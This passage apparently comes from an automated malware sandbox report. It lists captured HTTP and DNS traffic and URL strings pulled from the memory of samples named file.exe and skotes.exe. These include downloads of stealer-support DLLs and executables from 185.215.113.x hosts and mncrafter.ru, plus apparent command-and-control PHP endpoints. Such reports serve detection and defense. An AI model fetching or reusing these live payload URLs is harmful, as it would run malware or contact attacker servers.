Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /test2.exe HTTP/1.1Host: mncrafter.ru
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sun, 10 Nov 2024 23:53:54 GMTIf-None-Match: "67314792-1c3200"
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: mncrafter.ru

Source: unknown

HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 913sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Local
Source: skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb4uX
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe1
Source: file.exe, 00000000.00000002.1998156221.0000000001637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.1998156221.0000000001637000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeK
Source: skotes.exe, 0000000C.00000002.2950396161.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000C.00000002.2950396161.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 0000000C.00000002.2950396161.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe4c613
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exeI
Source: skotes.exe, 0000000C.00000002.2950396161.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exec61395dE
Source: skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000C.00000002.2950396161.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe)
Source: skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe.exez
Source: skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe1395d7
Source: skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe15001
Source: skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe61395dC
Source: skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe613a
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exes
Source: file.exe, 00000000.00000002.1998156221.00000000015DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1998156221.0000000001637000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1998156221.0000000001656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.1998156221.0000000001656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllM
Source: file.exe, 00000000.00000002.1998156221.0000000001656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.1998156221.0000000001656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.1998156221.0000000001656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllQ
Source: file.exe, 00000000.00000002.1998156221.0000000001656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dlli
Source: file.exe, 00000000.00000002.1998156221.0000000001656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.1998156221.0000000001656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllM
Source: file.exe, 00000000.00000002.1998156221.0000000001656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.1998156221.0000000001656000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll_
Source: file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllA
Source: file.exe, 00000000.00000002.2028498077.0000000023A06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2028498077.0000000023A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php$
Source: file.exe, 00000000.00000002.2028498077.0000000023A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php2g
Source: file.exe, 00000000.00000002.2028498077.00000000239FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php9z
Source: file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpH
Source: file.exe, 00000000.00000002.2028498077.00000000239FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpMy
Source: file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpSession
Source: file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: file.exe, 00000000.00000002.1998156221.0000000001637000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e
Source: file.exe, 00000000.00000002.1997064501.0000000000337000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206Local
Source: skotes.exe, 0000000C.00000003.2782915319.00000000014AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Local
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001439000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000C.00000002.2950396161.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000C.00000002.2950396161.000000000144D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000C.00000002.2950396161.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 0000000C.00000002.2950396161.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpG
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpI
Source: skotes.exe, 0000000C.00000002.2950396161.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpiF
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 0000000C.00000002.2950396161.000000000144D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpr
Source: skotes.exe, 0000000C.00000002.2950396161.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phps
Source: skotes.exe, 0000000C.00000002.2950396161.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php~
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp, test2.exe, 0000000D.00000003.2527135675.000001C7F7BD0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: lsass.exe, 00000035.00000000.2534214023.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534214023.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000035.00000000.2534593077.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2949177986.00000202C0400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000035.00000000.2534214023.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2947441669.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2947441669.00000202C03A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2940927699.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533434102.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000035.00000000.2533303286.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533434102.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000035.00000000.2534214023.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000003.2576254792.00000202C037D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534214023.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534099834.00000202C037F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 00000035.00000000.2534593077.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2949177986.00000202C0400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp, test2.exe, 0000000D.00000003.2527135675.000001C7F7BD0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp, test2.exe, 0000000D.00000003.2527135675.000001C7F7BD0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp, test2.exe, 0000000D.00000003.2527135675.000001C7F7BD0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 00000002.00000002.2530392131.000002165420F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: skotes.exe, 0000000C.00000002.2950396161.0000000001469000.00000004.00000020.00020000.00000000.sdmp, test2.exe, 0000000D.00000003.2527135675.000001C7F7BD0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lsass.exe, 00000035.00000000.2534214023.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2534214023.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000035.00000000.2534593077.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000002.2949177986.00000202C0400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000035.00000000.2533303286.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000035.00000000.2533434102.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
